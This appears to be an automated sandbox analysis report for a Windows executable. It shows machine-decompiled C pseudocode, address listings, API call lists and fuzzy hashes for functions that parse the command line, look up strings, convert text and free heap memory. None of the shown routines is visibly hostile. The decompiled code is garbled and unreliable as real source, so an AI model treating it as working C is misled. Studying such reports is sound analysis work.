                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorHeapLastLibraryPathProc$A680CharFreeInitializeLoadRemoveUppermemsetwcsncpy
                                        • String ID: pA
                                        • API String ID: 614692992-3924334338
                                        • Opcode ID: 31a3a0867e7b770f996ba1dd19f1056e952baccb9058816f1858b40f87ab5bfc
                                        • Instruction ID: 23f2717daea58df825e36a157420f594aa47e3a01e8443352da62a178e192d3b
                                        • Opcode Fuzzy Hash: 31a3a0867e7b770f996ba1dd19f1056e952baccb9058816f1858b40f87ab5bfc
                                        • Instruction Fuzzy Hash: F851E3B5514200BEE640BB739D86E7F26ADDBC4B1CB10CD3FB444AA0D3D93C89656A2D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040249D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0040249D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a36) {
				char _v0;
				signed int _v4;
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				char _v20;
				void* _t31;
				void* _t32;
				void* _t37;
				WCHAR* _t41;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				char* _t66;
				void* _t68;
				void* _t69;
				void* _t73;
				char _t84;
				void* _t85;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;

				_t102 = __esi;
				_t84 = 9;
				do {
					_t103 = _t103 - 4;
					_v8 = 0;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				E004051A0(E0040E600(), _a36);
				 *0x41808c = 0x4170c4;
				_v12 = 0;
				while(1) {
					_t106 = 6 - _v8;
					if(6 < _v8) {
						break;
					}
					_t66 =  *0x41808c; // 0x41708e
					_v4 =  *_t66;
					 *0x41808c =  *0x41808c + 1;
					_t68 = E0040E4C0();
					_t98 = _t84;
					_push(_t68);
					_push(_t98);
					_t69 = E0040E4C0();
					E00405D60(_t106, _v4 * 0xffffffff);
					E0040E500( &_v8, _t69);
					_push(_v12);
					_t73 = E0040E4C0();
					_pop(_t101);
					E0040E660(_t101);
					_t84 = _v20;
					E0040E660(_t84);
					E0040E500( &_v20, _t73);
					 *_t103 =  *_t103 + 1;
					if( *_t103 >= 0) {
						continue;
					}
					break;
				}
				_t31 = E0040E4C0();
				_t85 = _t84;
				_push(_t31);
				_t32 = E0040E4C0();
				E0040A1E0(GetCommandLineW(), _t32);
				E0040E500( &_v0, _t85);
				_push(_v8);
				_t37 = E0040E4C0();
				_pop(_t88);
				E0040E660(_t88);
				E0040E500( &_v8, _t37);
				_t41 = _v16;
				PathRemoveArgsW(_t41);
				_v12 = _t41;
				_v12 = E00405D80(_v16);
				if(_v12 > 0) {
					_push(_t88);
					_push(E0040E4C0());
					E0040E660(0x417026);
					_t56 = E0040E4C0();
					_t94 = 0x417026;
					_push(_t56);
					_t57 = E0040E4C0();
					_t95 = _t94;
					_push(_t57);
					_t58 = E0040E4C0();
					_t96 = _t95;
					_push(_t58);
					_t59 = E0040E4C0();
					_t97 = _t96;
					E00405182(E004060B0(_t102, _a4, _a16 + 1, _t59));
					 *_t103 =  *_t103 + _t97;
					E00406000();
					_push( &_v0);
					E0040E500();
				}
				E00409945(_a4, _a24);
				_push(_a16);
				_t44 = E0040E4C0();
				_pop(_t90);
				E0040E660(_t90);
				_t46 = _t44;
				_t47 = E00405170();
				_t91 = _t46;
				_t48 = _t47 + _t91;
				return E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(_t48, _a12), _v4), _v0), _v8), _a8);
			}






































                                        0x0040249d
                                        0x0040249e
                                        0x004024a3
                                        0x004024a3
                                        0x004024a6
                                        0x004024ad
                                        0x004024ad
                                        0x004024b9
                                        0x004024c3
                                        0x004024c8
                                        0x004024d1
                                        0x004024d6
                                        0x004024d9
                                        0x00000000
                                        0x00000000
                                        0x004024db
                                        0x004024e3
                                        0x004024e7
                                        0x004024ee
                                        0x004024f3
                                        0x004024f4
                                        0x004024f5
                                        0x004024f6
                                        0x00402505
                                        0x0040250f
                                        0x00402518
                                        0x00402519
                                        0x0040251e
                                        0x00402521
                                        0x00402526
                                        0x0040252b
                                        0x00402535
                                        0x0040253a
                                        0x0040253d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040253d
                                        0x00402540
                                        0x00402545
                                        0x00402546
                                        0x00402548
                                        0x00402555
                                        0x0040255f
                                        0x00402568
                                        0x00402569
                                        0x0040256e
                                        0x00402571
                                        0x0040257b
                                        0x00402580
                                        0x00402585
                                        0x0040258a
                                        0x00402597
                                        0x004025a1
                                        0x004025a3
                                        0x004025aa
                                        0x004025b1
                                        0x004025b7
                                        0x004025bc
                                        0x004025bd
                                        0x004025bf
                                        0x004025c4
                                        0x004025c5
                                        0x004025c7
                                        0x004025cc
                                        0x004025cd
                                        0x004025cf
                                        0x004025d4
                                        0x004025e5
                                        0x004025ea
                                        0x004025ed
                                        0x004025f7
                                        0x004025f8
                                        0x004025f8
                                        0x00402605
                                        0x0040260e
                                        0x0040260f
                                        0x00402614
                                        0x00402617
                                        0x0040261c
                                        0x0040261e
                                        0x00402623
                                        0x00402624
                                        0x00402663

                                        APIs
                                        • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                                        • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 00409945: SetEnvironmentVariableW.KERNELBASE(022F97F8,022F97F8,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040995E
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                          • Part of subcall function 0040E590: HeapFree.KERNEL32(022F0000,00000000,00000000,?,00000000,?,00412164,00000000,00000000,-00000008), ref: 0040E5A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                        • String ID: &pA
                                        • API String ID: 1199808876-3982879664
                                        • Opcode ID: 2d4dfa611378873e481ff5018031c281d8d44e8ba116892614c08f81f6aea7ee
                                        • Instruction ID: 844434d2d1440a0ca54de816100b64ccd0d0edb02743af080caed2b8ec9e32a7
                                        • Opcode Fuzzy Hash: 2d4dfa611378873e481ff5018031c281d8d44e8ba116892614c08f81f6aea7ee
                                        • Instruction Fuzzy Hash: D741F7B5514300AED640BB739D86D3F76A8EBC871CF10CD3FB584A6192DA3CC8655A2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004096DA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004096DA(void* __eflags, WCHAR* _a4) {
				signed int* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				WCHAR* _t11;
				signed int _t14;
				signed int _t15;
				WCHAR* _t17;
				signed int _t18;
				void* _t21;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				WCHAR* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				signed int* _t31;
				WCHAR* _t32;

				E0040D908( *0x41872c);
				_t15 = _t14 | 0xffffffff;
				_t32 = 0;
				_t11 = GetCommandLineW();
				_t31 = _v0;
				_t24 =  *_t11 & 0x0000ffff;
				if(_t24 == 0) {
					L30:
					if(_t31 != 0) {
						L34:
						 *_t31 = 0;
						return _t11;
					}
					return _t15;
				}
				_t17 = _a4;
				_v8 = 0x20;
				_v4 = 0x22;
				do {
					if(_t24 != _v8) {
						L5:
						_t25 =  *_t11 & 0x0000ffff;
						_a4 = 1;
						if(_t25 != _v4) {
							if(_t25 == 0) {
								_t26 = 0;
								L25:
								if(_v0 != _t15 || _t31 == 0) {
									goto L27;
								} else {
									if(_t32 == 0) {
										goto L34;
									}
									 *_t31 = _t17 - _t32 >> 1;
									_v0 =  &(_v0[0]);
									return _t32;
								}
							}
							_t32 = _t11;
							_t21 = 0x20;
							while(_t25 != _t21) {
								_t11 =  &(_t11[1]);
								_t28 = 0x22;
								if( *_t11 != _t28) {
									L20:
									_t25 =  *_t11 & 0x0000ffff;
									if(_t25 != 0) {
										continue;
									}
									break;
								}
								_t11 =  &(_t11[1]);
								_t23 =  *_t11 & 0x0000ffff;
								if(_t23 == 0) {
									L22:
									_t17 = _t11;
									L23:
									_t26 = _a4;
									goto L25;
								}
								while(_t23 != _t28) {
									_t11 =  &(_t11[1]);
									_t23 =  *_t11 & 0x0000ffff;
									if(_t23 != 0) {
										continue;
									}
									break;
								}
								_t21 = 0x20;
								goto L20;
							}
							L10:
							if( *_t11 == 0) {
								goto L22;
							}
							_t17 = _t11;
							_t11 =  &(_t11[1]);
							goto L23;
						}
						_t11 =  &(_t11[1]);
						_t32 = _t11;
						_t18 =  *_t11 & 0x0000ffff;
						if(_t18 == 0) {
							goto L22;
						}
						_t29 = 0x22;
						while(_t18 != _t29) {
							_t11 =  &(_t11[1]);
							_t18 =  *_t11 & 0x0000ffff;
							if(_t18 != 0) {
								continue;
							}
							goto L10;
						}
						goto L10;
					}
					_t30 = 0x20;
					do {
						_t11 =  &(_t11[1]);
					} while ( *_t11 == _t30);
					goto L5;
					L27:
					if(_t26 != 0) {
						_t15 = _t15 + 1;
					}
					_t32 = 0;
					_t24 =  *_t11 & 0x0000ffff;
				} while (_t24 != 0);
				goto L30;
			}





















                                        0x004096e6
                                        0x004096ed
                                        0x004096f2
                                        0x004096f4
                                        0x004096fa
                                        0x004096fe
                                        0x00409704
                                        0x004097da
                                        0x004097dc
                                        0x004097f3
                                        0x004097f5
                                        0x00000000
                                        0x004097f5
                                        0x00000000
                                        0x004097de
                                        0x0040970a
                                        0x0040970e
                                        0x00409716
                                        0x0040971e
                                        0x00409723
                                        0x00409730
                                        0x00409730
                                        0x00409733
                                        0x00409740
                                        0x00409773
                                        0x004097ba
                                        0x004097bc
                                        0x004097bf
                                        0x00000000
                                        0x004097e2
                                        0x004097e4
                                        0x00000000
                                        0x00000000
                                        0x004097ec
                                        0x004097ee
                                        0x00000000
                                        0x004097ee
                                        0x004097bf
                                        0x00409777
                                        0x00409779
                                        0x0040977a
                                        0x0040977f
                                        0x00409784
                                        0x00409788
                                        0x004097a8
                                        0x004097a8
                                        0x004097ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004097b0
                                        0x0040978a
                                        0x0040978d
                                        0x00409793
                                        0x004097b2
                                        0x004097b2
                                        0x004097b4
                                        0x004097b4
                                        0x00000000
                                        0x004097b4
                                        0x00409795
                                        0x0040979a
                                        0x0040979d
                                        0x004097a3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004097a3
                                        0x004097a7
                                        0x00000000
                                        0x004097a7
                                        0x00409762
                                        0x00409767
                                        0x00000000
                                        0x00000000
                                        0x00409769
                                        0x0040976b
                                        0x00000000
                                        0x0040976b
                                        0x00409742
                                        0x00409745
                                        0x00409747
                                        0x0040974d
                                        0x00000000
                                        0x00000000
                                        0x00409751
                                        0x00409752
                                        0x00409757
                                        0x0040975a
                                        0x00409760
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00409760
                                        0x00000000
                                        0x00409752
                                        0x00409727
                                        0x00409728
                                        0x00409728
                                        0x0040972b
                                        0x00000000
                                        0x004097c5
                                        0x004097c7
                                        0x004097c9
                                        0x004097c9
                                        0x004097cc
                                        0x004097ce
                                        0x004097d1
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0040D908: TlsGetValue.KERNEL32(?,00409809,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D90F
                                          • Part of subcall function 0040D908: RtlAllocateHeap.KERNEL32(00000008,?,?,00409809,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D92A
                                          • Part of subcall function 0040D908: TlsSetValue.KERNEL32(00000000,?,?,00409809,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D939
                                        • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409810,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 004096F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$AllocateCommandHeapLine
                                        • String ID: $"
                                        • API String ID: 565049335-3817095088
                                        • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                                        • Instruction ID: 8925b9375087d1f418fa8056259d7790d380ed9dab00279edd41941bbd44c2c0
                                        • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                                        • Instruction Fuzzy Hash: 27319273525221CADB649F24981137772A1EBA1B60F18813FE8926B3C2F37D4D419359
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A5D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E0040A5D8(intOrPtr* _a4, wchar_t* _a8) {
				signed int _t36;
				intOrPtr _t38;
				wchar_t* _t39;
				intOrPtr* _t50;
				intOrPtr* _t51;
				signed int _t52;

				_t39 = _a8;
				if(_t39 == 0) {
					_t39 = 0x413024;
				}
				_t51 = _a4;
				_push(_t39);
				if(( *(_t51 + 0x2c) & 0x00000001) == 0) {
					_t52 = E0040A8CF() %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + _t52 * 4));
					while(_t50 != 0) {
						if(wcscmp( *(_t50 + 4), _t39) == 0) {
							goto L8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					goto L13;
				} else {
					_t36 = E0040A8EA();
					_t38 =  *((intOrPtr*)(_t51 + 4));
					_t52 = _t36 %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)(_t38 + _t52 * 4));
					while(_t50 != 0) {
						_push(_t39);
						_push( *(_t50 + 4));
						L0040531F();
						if(_t38 == 0) {
							L8:
							 *(_t51 + 0x14) = _t52;
							 *_t51 = _t50;
							return _t50 + 8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					L13:
					return 0;
				}
			}









                                        0x0040a5d9
                                        0x0040a5e2
                                        0x0040a5e4
                                        0x0040a5e4
                                        0x0040a5e9
                                        0x0040a5ed
                                        0x0040a5f2
                                        0x0040a63a
                                        0x0040a63d
                                        0x0040a656
                                        0x0040a64f
                                        0x00000000
                                        0x00000000
                                        0x0040a651
                                        0x0040a654
                                        0x0040a654
                                        0x00000000
                                        0x0040a5f4
                                        0x0040a5f4
                                        0x0040a5fe
                                        0x0040a601
                                        0x0040a604
                                        0x0040a61d
                                        0x0040a609
                                        0x0040a60a
                                        0x0040a60d
                                        0x0040a616
                                        0x0040a623
                                        0x0040a623
                                        0x0040a629
                                        0x00000000
                                        0x0040a629
                                        0x0040a618
                                        0x0040a61b
                                        0x0040a61b
                                        0x0040a65a
                                        0x00000000
                                        0x0040a65a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: _wcsicmpwcscmp
                                        • String ID: $0A
                                        • API String ID: 3419221977-513306843
                                        • Opcode ID: 46e84c9f9e851dd55e0104cb1799a7aa00b5e02752d0fafc9d4f056a3ff0d919
                                        • Instruction ID: 77110c2369c0a2376094c1513fa24a3ff6f3d1c253f2dfbca05bac7820ca5b0c
                                        • Opcode Fuzzy Hash: 46e84c9f9e851dd55e0104cb1799a7aa00b5e02752d0fafc9d4f056a3ff0d919
                                        • Instruction Fuzzy Hash: 3611BF76508B018BD320DF56E440913B3F5EF94364728883FE98963790DB3AEC218B6A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405700, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405700(short* _a4) {
				char* _t6;
				short* _t7;
				int _t8;

				_t7 = _a4;
				if(_t7 == 0) {
					_t7 = 0x413024;
				}
				_t8 = WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, 0, 0, 0, 0);
				_t6 = E0040A1C0(_t8);
				if(_t6 != 0) {
					WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, _t6, _t8, 0, 0);
				}
				return _t6;
			}






                                        0x00405702
                                        0x00405709
                                        0x0040570b
                                        0x0040570b
                                        0x00405728
                                        0x00405730
                                        0x00405734
                                        0x00405746
                                        0x00405746
                                        0x00405751

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID: $0A
                                        • API String ID: 626452242-513306843
                                        • Opcode ID: a61a9794319e28fd8acbf85c8e61b16a94ebc47f14535b292021c292679dfc85
                                        • Instruction ID: 54be351cbfa86f260f7e6bda347426d1acab3f2150a351b6875deef155b7b5ee
                                        • Opcode Fuzzy Hash: a61a9794319e28fd8acbf85c8e61b16a94ebc47f14535b292021c292679dfc85
                                        • Instruction Fuzzy Hash: 4CF06D3A3863217BE230215A5C0AF672A6DCB86F71F3542327B24BF2D0C5B0680046BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A4EF, Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0040A4EF(void* _a4) {
				void* __ebp;
				void* _t7;
				void* _t12;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t20 = _a4;
				_t27 = _t20;
				if(_t20 != 0) {
					_push(_t24);
					E0040A73A(_t19, _t27, _t20);
					E0040DF66(_t24,  *((intOrPtr*)(_t20 + 0x38)));
					HeapFree( *0x418068, 0,  *(_t20 + 4));
					HeapFree( *0x418068, 0,  *(_t20 + 0xc));
					_t12 =  *(_t20 + 0x34);
					if(_t12 == 0) {
						L5:
						 *((intOrPtr*)( *((intOrPtr*)(_t20 + 0x30)))) = 0;
						return HeapFree( *0x418068, 0, _t20);
					}
					do {
						_t22 =  *_t12;
						HeapFree( *0x418068, 0, _t12);
						_t12 = _t22;
					} while (_t22 != 0);
					goto L5;
				}
				return _t7;
			}










                                        0x0040a4f0
                                        0x0040a4f4
                                        0x0040a4f6
                                        0x0040a4f9
                                        0x0040a4fb
                                        0x0040a503
                                        0x0040a51a
                                        0x0040a526
                                        0x0040a528
                                        0x0040a52d
                                        0x0040a543
                                        0x0040a548
                                        0x00000000
                                        0x0040a553
                                        0x0040a530
                                        0x0040a530
                                        0x0040a53a
                                        0x0040a53c
                                        0x0040a53e
                                        0x00000000
                                        0x0040a542
                                        0x0040a555

                                        APIs
                                          • Part of subcall function 0040A73A: memset.MSVCRT ref: 0040A7A2
                                          • Part of subcall function 0040DF66: RtlEnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3), ref: 0040DF7A
                                          • Part of subcall function 0040DF66: HeapFree.KERNEL32(00000000,?,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004), ref: 0040DFC8
                                          • Part of subcall function 0040DF66: RtlLeaveCriticalSection.KERNEL32(00418684,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040DFCF
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A51A
                                        • HeapFree.KERNEL32(00000000,?,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A526
                                        • HeapFree.KERNEL32(00000000,?,?,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A53A
                                        • HeapFree.KERNEL32(00000000,00000000,?,?,0040A40F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A550
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                        • String ID:
                                        • API String ID: 4254243056-0
                                        • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                                        • Instruction ID: b1b4a4e335906cfcd35d4528719aacf147db618a683be28e3f5857f094840cb4
                                        • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                                        • Instruction Fuzzy Hash: F0F03C72100219BFC6115B1AED80C67BF6DFF4A798342812AB404A3670CB32AD65DBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%